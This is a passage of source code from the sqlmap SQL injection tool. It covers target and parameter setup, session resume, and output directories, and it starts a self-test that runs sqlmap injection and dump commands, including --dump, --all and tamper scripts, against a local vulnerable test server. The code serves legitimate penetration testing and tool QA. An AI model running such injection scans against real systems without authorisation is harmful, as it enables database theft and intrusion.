value.split(kb.customInjectionMark)\n\n                    for i in xrange(len(parts) - 1):\n                        name = None\n                        if kb.postHint:\n                            for ending, _ in hintNames:\n                                if parts[i].endswith(ending):\n                                    name = \"%s %s\" % (kb.postHint, _)\n                                    break\n                        if name is None:\n                            name = \"%s#%s%s\" % ((\"%s \" % kb.postHint) if kb.postHint else \"\", i + 1, kb.customInjectionMark)\n                        conf.paramDict[place][name] = \"\".join(\"%s%s\" % (parts[j], kb.customInjectionMark if i == j else \"\") for j in xrange(len(parts)))\n\n                    if place == PLACE.URI and PLACE.GET in conf.paramDict:\n                        del conf.paramDict[PLACE.GET]\n                    elif place == PLACE.CUSTOM_POST and PLACE.POST in conf.paramDict:\n                        del conf.paramDict[PLACE.POST]\n\n                testableParameters = True\n\n    if kb.processUserMarks:\n        for item in (\"url\", \"data\", \"agent\", \"referer\", \"cookie\"):\n            if conf.get(item):\n                conf[item] = conf[item].replace(kb.customInjectionMark, \"\")\n\n    # Perform checks on Cookie parameters\n    if conf.cookie:\n        conf.parameters[PLACE.COOKIE] = conf.cookie\n        paramDict = paramToDict(PLACE.COOKIE, conf.cookie)\n\n        if paramDict:\n            conf.paramDict[PLACE.COOKIE] = paramDict\n            testableParameters = True\n\n    # Perform checks on header values\n    if conf.httpHeaders:\n        for httpHeader, headerValue in list(conf.httpHeaders):\n            # Url encoding of the header values should be avoided\n            # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value\n\n            if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper():\n                conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)\n\n                condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True)))\n\n                if condition:\n                    conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}\n                    testableParameters = True\n\n            elif httpHeader.upper() == HTTP_HEADER.REFERER.upper():\n                conf.parameters[PLACE.REFERER] = urldecode(headerValue)\n\n                condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True)))\n\n                if condition:\n                    conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}\n                    testableParameters = True\n\n            elif httpHeader.upper() == HTTP_HEADER.HOST.upper():\n                conf.parameters[PLACE.HOST] = urldecode(headerValue)\n\n                condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True)))\n\n                if condition:\n                    conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue}\n                    testableParameters = True\n\n            else:\n                condition = intersect(conf.testParameter, [httpHeader], True)\n\n                if condition:\n                    conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)\n                    conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: \"%s,%s%s\" % (httpHeader, headerValue, kb.customInjectionMark)}\n                    conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, \"\")) for _ in conf.httpHeaders]\n                    testableParameters = True\n\n    if not conf.parameters:\n        errMsg = \"you did not provide any GET, POST and Cookie \"\n        errMsg += \"parameter, neither an User-Agent, Referer or Host header value\"\n        raise SqlmapGenericException(errMsg)\n\n    elif not testableParameters:\n        errMsg = \"all testable parameters you provided are not present \"\n        errMsg += \"within the given request data\"\n        raise SqlmapGenericException(errMsg)\n\n    if conf.csrfToken:\n        if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}), conf.paramDict.get(PLACE.COOKIE, {}))) and not re.search(r\"\\b%s\\b\" % conf.csrfToken, conf.data or \"\") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}) and not all(re.search(conf.csrfToken, _, re.I) for _ in conf.paramDict.get(PLACE.URI, {}).values()):\n            errMsg = \"anti-CSRF token parameter '%s' not \" % conf.csrfToken._original\n            errMsg += \"found in provided GET, POST, Cookie or header values\"\n            raise SqlmapGenericException(errMsg)\n    else:\n        for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):\n            if conf.csrfToken:\n                break\n\n            for parameter in conf.paramDict.get(place, {}):\n                if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):\n                    message = \"%sparameter '%s' appears to hold anti-CSRF token. \" % (\"%s \" % place if place != parameter else \"\", parameter)\n                    message += \"Do you want sqlmap to automatically update it in further requests? [y/N] \"\n\n                    if readInput(message, default='N', boolean=True):\n                        class _(six.text_type):\n                            pass\n                        conf.csrfToken = _(re.escape(getUnicode(parameter)))\n                        conf.csrfToken._original = getUnicode(parameter)\n                        break\n\ndef _setHashDB():\n    \"\"\"\n    Check and set the HashDB SQLite file for query resume functionality.\n    \"\"\"\n\n    if not conf.hashDBFile:\n        conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE)\n\n    if conf.flushSession:\n        if os.path.exists(conf.hashDBFile):\n            if conf.hashDB:\n                conf.hashDB.closeAll()\n\n            try:\n                os.remove(conf.hashDBFile)\n                logger.info(\"flushing session file\")\n            except OSError as ex:\n                errMsg = \"unable to flush the session file ('%s')\" % getSafeExString(ex)\n                raise SqlmapFilePathException(errMsg)\n\n    conf.hashDB = HashDB(conf.hashDBFile)\n\ndef _resumeHashDBValues():\n    \"\"\"\n    Resume stored data values from HashDB\n    \"\"\"\n\n    kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths\n    kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables\n    kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns\n    kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars\n    kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings\n    kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable\n\n    kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH)\n    if isNumPosStrValue(kb.errorChunkLength):\n        kb.errorChunkLength = int(kb.errorChunkLength)\n    else:\n        kb.errorChunkLength = None\n\n    conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)\n\n    for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:\n        if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:\n            if not conf.technique or intersect(conf.technique, injection.data.keys()):\n                if intersect(conf.technique, injection.data.keys()):\n                    injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.technique)\n                if injection not in kb.injections:\n                    kb.injections.append(injection)\n                    kb.vulnHosts.add(conf.hostname)\n\n    _resumeDBMS()\n    _resumeOS()\n\ndef _resumeDBMS():\n    \"\"\"\n    Resume stored DBMS information from HashDB\n    \"\"\"\n\n    value = hashDBRetrieve(HASHDB_KEYS.DBMS)\n\n    if not value:\n        if conf.offline:\n            errMsg = \"unable to continue in offline mode \"\n            errMsg += \"because of lack of usable \"\n            errMsg += \"session data\"\n            raise SqlmapNoneDataException(errMsg)\n        else:\n            return\n\n    dbms = value.lower()\n    dbmsVersion = [UNKNOWN_DBMS_VERSION]\n    _ = \"(%s)\" % ('|'.join(SUPPORTED_DBMS))\n    _ = re.search(r\"\\A%s (.*)\" % _, dbms, re.I)\n\n    if _:\n        dbms = _.group(1).lower()\n        dbmsVersion = [_.group(2)]\n\n    if conf.dbms:\n        check = True\n        for aliases, _, _, _ in DBMS_DICT.values():\n            if conf.dbms.lower() in aliases and dbms not in aliases:\n                check = False\n                break\n\n        if not check:\n            message = \"you provided '%s' as a back-end DBMS, \" % conf.dbms\n            message += \"but from a past scan information on the target URL \"\n            message += \"sqlmap assumes the back-end DBMS is '%s'. \" % dbms\n            message += \"Do you really want to force the back-end \"\n            message += \"DBMS value? [y/N] \"\n\n            if not readInput(message, default='N', boolean=True):\n                conf.dbms = None\n                Backend.setDbms(dbms)\n                Backend.setVersionList(dbmsVersion)\n    else:\n        infoMsg = \"resuming back-end DBMS '%s' \" % dbms\n        logger.info(infoMsg)\n\n        Backend.setDbms(dbms)\n        Backend.setVersionList(dbmsVersion)\n\ndef _resumeOS():\n    \"\"\"\n    Resume stored OS information from HashDB\n    \"\"\"\n\n    value = hashDBRetrieve(HASHDB_KEYS.OS)\n\n    if not value:\n        return\n\n    os = value\n\n    if os and os != 'None':\n        infoMsg = \"resuming back-end DBMS operating system '%s' \" % os\n        logger.info(infoMsg)\n\n        if conf.os and conf.os.lower() != os.lower():\n            message = \"you provided '%s' as back-end DBMS operating \" % conf.os\n            message += \"system, but from a past scan information on the \"\n            message += \"target URL sqlmap assumes the back-end DBMS \"\n            message += \"operating system is %s. \" % os\n            message += \"Do you really want to force the back-end DBMS \"\n            message += \"OS value? [y/N] \"\n\n            if not readInput(message, default='N', boolean=True):\n                conf.os = os\n        else:\n            conf.os = os\n\n        Backend.setOs(conf.os)\n\ndef _setResultsFile():\n    \"\"\"\n    Create results file for storing results of running in a\n    multiple target mode.\n    \"\"\"\n\n    if not conf.multipleTargets:\n        return\n\n    if not conf.resultsFP:\n        conf.resultsFile = conf.resultsFile or os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())\n        found = os.path.exists(conf.resultsFile)\n\n        try:\n            conf.resultsFP = openFile(conf.resultsFile, \"a\", UNICODE_ENCODING, buffering=0)\n        except (OSError, IOError) as ex:\n            try:\n                warnMsg = \"unable to create results file '%s' ('%s'). \" % (conf.resultsFile, getUnicode(ex))\n                handle, conf.resultsFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=\".csv\")\n                os.close(handle)\n                conf.resultsFP = openFile(conf.resultsFile, \"w+\", UNICODE_ENCODING, buffering=0)\n                warnMsg += \"Using temporary file '%s' instead\" % conf.resultsFile\n                logger.warning(warnMsg)\n            except IOError as _:\n                errMsg = \"unable to write to the temporary directory ('%s'). \" % _\n                errMsg += \"Please make sure that your disk is not full and \"\n                errMsg += \"that you have sufficient write permissions to \"\n                errMsg += \"create temporary files and/or directories\"\n                raise SqlmapSystemException(errMsg)\n\n        if not found:\n            conf.resultsFP.writelines(\"Target URL,Place,Parameter,Technique(s),Note(s)%s\" % os.linesep)\n\n        logger.info(\"using '%s' as the CSV results file in multiple targets mode\" % conf.resultsFile)\n\ndef _createFilesDir():\n    \"\"\"\n    Create the file directory.\n    \"\"\"\n\n    if not any((conf.fileRead, conf.commonFiles)):\n        return\n\n    conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname\n\n    if not os.path.isdir(conf.filePath):\n        try:\n            os.makedirs(conf.filePath)\n        except OSError as ex:\n            tempDir = tempfile.mkdtemp(prefix=\"sqlmapfiles\")\n            warnMsg = \"unable to create files directory \"\n            warnMsg += \"'%s' (%s). \" % (conf.filePath, getUnicode(ex))\n            warnMsg += \"Using temporary directory '%s' instead\" % getUnicode(tempDir)\n            logger.warning(warnMsg)\n\n            conf.filePath = tempDir\n\ndef _createDumpDir():\n    \"\"\"\n    Create the dump directory.\n    \"\"\"\n\n    if not conf.dumpTable and not conf.dumpAll and not conf.search:\n        return\n\n    conf.dumpPath = safeStringFormat(paths.SQLMAP_DUMP_PATH, conf.hostname)\n\n    if not os.path.isdir(conf.dumpPath):\n        try:\n            os.makedirs(conf.dumpPath)\n        except OSError as ex:\n            tempDir = tempfile.mkdtemp(prefix=\"sqlmapdump\")\n            warnMsg = \"unable to create dump directory \"\n            warnMsg += \"'%s' (%s). \" % (conf.dumpPath, getUnicode(ex))\n            warnMsg += \"Using temporary directory '%s' instead\" % getUnicode(tempDir)\n            logger.warning(warnMsg)\n\n            conf.dumpPath = tempDir\n\ndef _configureDumper():\n    conf.dumper = dumper\n    conf.dumper.setOutputFile()\n\ndef _createTargetDirs():\n    \"\"\"\n    Create the output directory.\n    \"\"\"\n\n    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))\n\n    try:\n        if not os.path.isdir(conf.outputPath):\n            os.makedirs(conf.outputPath)\n    except (OSError, IOError, TypeError) as ex:\n        tempDir = tempfile.mkdtemp(prefix=\"sqlmapoutput\")\n        warnMsg = \"unable to create output directory \"\n        warnMsg += \"'%s' (%s). \" % (conf.outputPath, getUnicode(ex))\n        warnMsg += \"Using temporary directory '%s' instead\" % getUnicode(tempDir)\n        logger.warning(warnMsg)\n\n        conf.outputPath = tempDir\n\n    conf.outputPath = getUnicode(conf.outputPath)\n\n    try:\n        with openFile(os.path.join(conf.outputPath, \"target.txt\"), \"w+\") as f:\n            f.write(getUnicode(kb.originalUrls.get(conf.url) or conf.url or conf.hostname))\n            f.write(\" (%s)\" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))\n            f.write(\"  # %s\" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))\n            if conf.data:\n                f.write(\"\\n\\n%s\" % getUnicode(conf.data))\n    except IOError as ex:\n        if \"denied\" in getUnicode(ex):\n            errMsg = \"you don't have enough permissions \"\n        else:\n            errMsg = \"something went wrong while trying \"\n        errMsg += \"to write to the output directory '%s' (%s)\" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex))\n\n        raise SqlmapMissingPrivileges(errMsg)\n    except UnicodeError as ex:\n        warnMsg = \"something went wrong while saving target data ('%s')\" % getSafeExString(ex)\n        logger.warning(warnMsg)\n\n    _createDumpDir()\n    _createFilesDir()\n    _configureDumper()\n\ndef _setAuxOptions():\n    \"\"\"\n    Setup auxiliary (host-dependent) options\n    \"\"\"\n\n    kb.aliasName = randomStr(seed=hash(conf.hostname or \"\"))\n\ndef _restoreMergedOptions():\n    \"\"\"\n    Restore merged options (command line, configuration file and default values)\n    that could be possibly changed during the testing of previous target.\n    \"\"\"\n\n    for option in RESTORE_MERGED_OPTIONS:\n        conf[option] = mergedOptions[option]\n\ndef initTargetEnv():\n    \"\"\"\n    Initialize target environment.\n    \"\"\"\n\n    if conf.multipleTargets:\n        if conf.hashDB:\n            conf.hashDB.close()\n\n        if conf.cj:\n            resetCookieJar(conf.cj)\n\n        threadData = getCurrentThreadData()\n        threadData.reset()\n\n        conf.paramDict = {}\n        conf.parameters = {}\n        conf.hashDBFile = None\n\n        _setKnowledgeBaseAttributes(False)\n        _restoreMergedOptions()\n        _setDBMS()\n\n    if conf.data:\n        class _(six.text_type):\n            pass\n\n        kb.postUrlEncode = True\n\n        for key, value in conf.httpHeaders:\n            if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():\n                kb.postUrlEncode = \"urlencoded\" in value\n                break\n\n        if kb.postUrlEncode:\n            original = conf.data\n            conf.data = _(urldecode(conf.data))\n            setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)\n            kb.postSpaceToPlus = '+' in original\n\n    if conf.data and unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST:\n        if '=' not in conf.data.strip('='):\n            try:\n                original = conf.data\n                conf.data = _(decodeBase64(conf.data, binary=False))\n                setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)\n            except:\n                pass\n\n    match = re.search(INJECT_HERE_REGEX, \"%s %s %s\" % (conf.url, conf.data, conf.httpHeaders))\n    kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR\n\ndef setupTargetEnv():\n    _createTargetDirs()\n    _setRequestParams()\n    _setHashDB()\n    _resumeHashDBValues()\n    _setResultsFile()\n    _setAuthCred()\n    _setAuxOptions()\n"
  },
  {
    "path": "sqlmap/lib/core/testing.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport doctest\nimport logging\nimport os\nimport random\nimport re\nimport socket\nimport sqlite3\nimport sys\nimport tempfile\nimport threading\nimport time\n\nfrom extra.vulnserver import vulnserver\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import shellExec\nfrom lib.core.compat import round\nfrom lib.core.convert import encodeBase64\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.data import queries\nfrom lib.core.patch import unisonRandom\nfrom lib.core.settings import IS_WIN\n\ndef vulnTest():\n    \"\"\"\n    Runs the testing against 'vulnserver'\n    \"\"\"\n\n    TESTS = (\n        (\"-h\", (\"to see full list of options run with '-hh'\",)),\n        (\"--dependencies\", (\"sqlmap requires\", \"third-party library\")),\n        (\"-u <url> --data=\\\"reflect=1\\\" --flush-session --wizard --disable-coloring\", (\"Please choose:\", \"back-end DBMS: SQLite\", \"current user is DBA: True\", \"banner: '3.\")),\n        (\"-u <url> --data=\\\"code=1\\\" --code=200 --technique=B --banner --no-cast --flush-session\", (\"back-end DBMS: SQLite\", \"banner: '3.\", \"~COALESCE(CAST(\")),\n        (u\"-c <config> --flush-session --output-dir=\\\"<tmpdir>\\\" --smart --roles --statements --hostname --privileges --sql-query=\\\"SELECT '\\u0161u\\u0107uraj'\\\" --technique=U\", (u\": '\\u0161u\\u0107uraj'\", \"on SQLite it is not possible\", \"as the output directory\")),\n        (u\"-u <url> --flush-session --sql-query=\\\"SELECT '\\u0161u\\u0107uraj'\\\" --technique=B --no-escape --string=luther --unstable\", (u\": '\\u0161u\\u0107uraj'\",)),\n        (\"-m <multiple> --flush-session --technique=B --banner\", (\"/3] URL:\", \"back-end DBMS: SQLite\", \"banner: '3.\")),\n        (\"--dummy\", (\"all tested parameters do not appear to be injectable\", \"does not seem to be injectable\", \"there is not at least one\", \"~might be injectable\")),\n        (\"-u \\\"<url>&id2=1\\\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\\\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\\\"\", (\"~1AND\",)),\n        (\"--list-tampers\", (\"between\", \"MySQL\", \"xforwardedfor\")),\n        (\"-r <request> --flush-session -v 5 --test-skip=\\\"heavy\\\" --save=<config>\", (\"CloudFlare\", \"web application technology: Express\", \"possible DBMS: 'SQLite'\", \"User-agent: foobar\", \"~Type: time-based blind\", \"saved command line options to the configuration file\")),\n        (\"-c <config>\", (\"CloudFlare\", \"possible DBMS: 'SQLite'\", \"User-agent: foobar\", \"~Type: time-based blind\")),\n        (\"-l <log> --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors\", (\"banner: '3.\", \"ORDER BY term out of range\", \"~xp_cmdshell\", \"Connection: keep-alive\")),\n        (\"-l <log> --offline --banner -v 5\", (\"banner: '3.\", \"~[TRAFFIC OUT]\")),\n        (\"-u <base> --flush-session --data=\\\"id=1&_=Eewef6oh\\\" --chunked --randomize=_ --random-agent --banner\", (\"fetched random HTTP User-Agent header value\", \"Parameter: id (POST)\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \"banner: '3.\")),\n        (\"-u <base64> -p id --base64=id --data=\\\"base64=true\\\" --flush-session --banner --technique=B\", (\"banner: '3.\",)),\n        (\"-u <base64> -p id --base64=id --data=\\\"base64=true\\\" --flush-session --tables --technique=U\", (\" users \",)),\n        (\"-u <url> --flush-session --banner --technique=B --disable-precon --not-string \\\"no results\\\"\", (\"banner: '3.\",)),\n        (\"-u <url> --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2\", (\"banner: '3.'\",)),\n        (\"-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner\", (\"total of 2 targets\", \"might be injectable\", \"Type: UNION query\", \"banner: '3.\")),\n        (\"-u <base> --flush-session --data=\\\"{\\\\\\\"id\\\\\\\": 1}\\\" --banner\", (\"might be injectable\", \"3 columns\", \"Payload: {\\\"id\\\"\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \"banner: '3.\")),\n        (\"-u <base> --flush-session -H \\\"Foo: Bar\\\" -H \\\"Sna: Fu\\\" --data=\\\"<root><param name=\\\\\\\"id\\\\\\\" value=\\\\\\\"1*\\\\\\\"/></root>\\\" --union-char=1 --mobile --answers=\\\"smartphone=3\\\" --banner --smart -v 5\", (\"might be injectable\", \"Payload: <root><param name=\\\"id\\\" value=\\\"1\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \"banner: '3.\", \"Nexus\", \"Sna: Fu\", \"Foo: Bar\")),\n        (\"-u <base> --flush-session --method=PUT --data=\\\"a=1;id=1;b=2\\\" --param-del=\\\";\\\" --skip-static --har=<tmpfile> --dump -T users --start=1 --stop=2\", (\"might be injectable\", \"Parameter: id (PUT)\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \"2 entries\")),\n        (\"-u <url> --flush-session -H \\\"id: 1*\\\" --tables -t <tmpfile>\", (\"might be injectable\", \"Parameter: id #1* ((custom) HEADER)\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \" users \")),\n        (\"-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter=\\\"OR boolean\\\" --tamper=space2dash\", (\"banner: '3.\", \" LIKE \")),\n        (\"-u <url> --flush-session --cookie=\\\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\\\" --tables --union-cols=3\", (\"might be injectable\", \"Cookie #1* ((custom) HEADER)\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \" users \")),\n        (\"-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users\", (\"NULL connection is supported with HEAD method\", \"banner: '3.\", \"users | 5\")),\n        (\"-u <base> --data=\\\"aWQ9MQ==\\\" --flush-session --base64=POST -v 6\", (\"aWQ9MTtXQUlURk9SIERFTEFZICcwOjA\",)),\n        (\"-u <url> --flush-session --parse-errors --test-filter=\\\"subquery\\\" --eval=\\\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\\\" --referer=\\\"localhost\\\"\", (\"might be injectable\", \": syntax error\", \"back-end DBMS: SQLite\", \"WHERE or HAVING clause (subquery\")),\n        (\"-u <url> --banner --schema --dump -T users --binary-fields=surname --where \\\"id>3\\\"\", (\"banner: '3.\", \"INTEGER\", \"TEXT\", \"id\", \"name\", \"surname\", \"2 entries\", \"6E616D6569736E756C6C\")),\n        (\"-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\\\"crack=n\\\" -v 3\", (\"performed 6 queries\", \"nameisnull\", \"~using default dictionary\", \"dumped to HTML file\")),\n        (\"-u <url> --flush-session --all\", (\"5 entries\", \"Type: boolean-based blind\", \"Type: time-based blind\", \"Type: UNION query\", \"luther\", \"blisset\", \"fluffy\", \"179ad45c6ce2cb97cf1029e212046e81\", \"NULL\", \"nameisnull\", \"testpass\")),\n        (\"-u <url> -z \\\"tec=B\\\" --hex --fresh-queries --threads=4 --sql-query=\\\"SELECT * FROM users\\\"\", (\"SELECT * FROM users [5]\", \"nameisnull\")),\n        (\"-u \\\"<url>&echo=foobar*\\\" --flush-session\", (\"might be vulnerable to cross-site scripting\",)),\n        (\"-u \\\"<url>&query=*\\\" --flush-session --technique=Q --banner\", (\"Title: SQLite inline queries\", \"banner: '3.\")),\n        (\"-d \\\"<direct>\\\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \\\"id=3\\\"\", (\"7775\", \"179ad45c6ce2cb97cf1029e212046e81 (testpass)\", \"dumped to SQLITE database\")),\n        (\"-d \\\"<direct>\\\" --flush-session --banner --schema --sql-query=\\\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\\\"\", (\"banner: '3.\", \"INTEGER\", \"TEXT\", \"id\", \"name\", \"surname\", \"5, foobar, nameisnull\", \"'987654321'\",)),\n        (\"--purge -v 3\", (\"~ERROR\", \"~CRITICAL\", \"deleting the whole directory tree\")),\n    )\n\n    retVal = True\n    count = 0\n\n    while True:\n        address, port = \"127.0.0.1\", random.randint(10000, 65535)\n        try:\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            if s.connect_ex((address, port)):\n                break\n            else:\n                time.sleep(1)\n        finally:\n            s.close()\n\n    def _thread():\n        vulnserver.init(quiet=True)\n        vulnserver.run(address=address, port=port)\n\n    vulnserver._alive = True\n\n    thread = threading.Thread(target=_thread)\n    thread.daemon = True\n    thread.start()\n\n    while vulnserver._alive:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        try:\n            s.connect((address, port))\n            s.sendall(b\"GET / HTTP/1.1\\r\\n\\r\\n\")\n            result = b\"\"\n            while True:\n                current = s.recv(1024)\n                if not current:\n                    break\n                else:\n                    result += current\n            if b\"vulnserver\" in result:\n                break\n        except:\n            pass\n        finally:\n            s.close()\n        time.sleep(1)\n\n    if not vulnserver._alive:\n        logger.error(\"problem occurred in vulnserver instantiation (address: 'http://%s:%s')\" % (address, port))\n        return False\n    else:\n        logger.info(\"vulnserver running at 'http://%s:%s'...\" % (address, port))\n\n    handle, config = tempfile.mkstemp(suffix=\".conf\")\n    os.close(handle)\n\n    handle, database = tempfile.mkstemp(suffix=\".sqlite\")\n    os.close(handle)\n\n    with sqlite3.connect(database) as conn:\n        c = conn.cursor()\n        c.executescript(vulnserver.SCHEMA)\n\n    handle, request = tempfile.mkstemp(suffix=\".req\")\n    os.close(handle)\n\n    handle, log = tempfile.mkstemp(suffix=\".log\")\n    os.close(handle)\n\n    handle, multiple = tempfile.mkstemp(suffix=\".lst\")\n    os.close(handle)\n\n    content = \"POST / HTTP/1.0\\nUser-agent: foobar\\nHost: %s:%s\\n\\nid=1\\n\" % (address, port)\n    with open(request, \"w+\") as f:\n        f.write(content)\n        f.flush()\n\n    content = '<port>%d</port><request base64=\"true\"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False))\n    with open(log, \"w+\") as f:\n        f.write(content)\n        f.flush()\n\n    base = \"http://%s:%d/\" % (address, port)\n    url = \"%s?id=1\" % base\n    direct = \"sqlite3://%s\" % database\n    tmpdir = tempfile.mkdtemp()\n\n    content = open(os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"sqlmap.conf\"))).read().replace(\"url =\", \"url = %s\" % url)\n    with open(config, \"w+\") as f:\n        f.write(content)\n        f.flush()\n\n    content = \"%s?%s=%d\\n%s?%s=%d\\n%s&%s=1\" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr())\n    with open(multiple, \"w+\") as f:\n        f.write(content)\n        f.flush()\n\n    for options, checks in TESTS:\n        status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS)))\n        dataToStdout(\"\\r[%s] [INFO] complete: %s\" % (time.strftime(\"%X\"), status))\n\n        if IS_WIN and \"uraj\" in options:\n            options = options.replace(u\"\\u0161u\\u0107uraj\", \"sucuraj\")\n            checks = [check.replace(u\"\\u0161u\\u0107uraj\", \"sucuraj\") for check in checks]\n\n        for tag, value in ((\"<url>\", url), (\"<base>\", base), (\"<direct>\", direct), (\"<tmpdir>\", tmpdir), (\"<request>\", request), (\"<log>\", log), (\"<multiple>\", multiple), (\"<config>\", config), (\"<base64>\", url.replace(\"id=1\", \"id=MZ=%3d\"))):\n            options = options.replace(tag, value)\n\n        cmd = \"%s \\\"%s\\\" %s --batch --non-interactive --debug --time-sec=1\" % (sys.executable if ' ' not in sys.executable else '\"%s\"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"sqlmap.py\")), options)\n\n        if \"<tmpfile>\" in cmd:\n            handle, tmp = tempfile.mkstemp()\n            os.close(handle)\n            cmd = cmd.replace(\"<tmpfile>\", tmp)\n\n        output = shellExec(cmd)\n\n        if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or \"unhandled exception\" in output:\n            dataToStdout(\"---\\n\\n$ %s\\n\" % cmd)\n            dataToStdout(\"%s---\\n\" % output, coloring=False)\n            retVal = False\n\n        count += 1\n\n    clearConsoleLine()\n    if retVal:\n        logger.info(\"vuln test final result: PASSED\")\n    else:\n        logger.error(\"vuln test final result: FAILED\")\n\n    return retVal\n\ndef smokeTest():\n    \"\"\"\n    Runs the basic smoke testing of a program\n    \"\"\"\n\n    unisonRandom()\n\n    content = open(paths.ERRORS_XML, \"r\").read()\n    for regex in re.findall(r'<error regexp=\"(.+?)\"/>', content):\n        try:\n            re.compile(regex)\n        except re.error:\n            errMsg = \"smoke test failed at compiling '%s'\" % regex\n            logger.error(errMsg)\n            return False\n\n    retVal = True\n    count, length = 0, 0\n\n    for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):\n        if any(_ in root for _ in (\"thirdparty\", \"extra\", \"interbase\")):\n            continue\n\n        for filename in files:\n            if os.path.splitext(filename)[1].lower() == \".py\" and filename != \"__init__.py\":\n                length += 1\n\n    for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):\n        if any(_ in root for _ in (\"thirdparty\", \"extra\", \"interbase\")):\n            continue\n\n        for filename in files:\n            if os.path.splitext(filename)[1].lower() == \".py\" and filename not in (\"__init__.py\", \"gui.py\"):\n                path = os.path.join(root, os.path.splitext(filename)[0])\n                path = path.replace(paths.SQLMAP_ROOT_PATH, '.')\n                path = path.replace(os.sep, '.').lstrip('.')\n                try:\n                    __import__(path)\n                    module = sys.modules[path]\n                except Exception as ex:\n                    retVal = False\n                    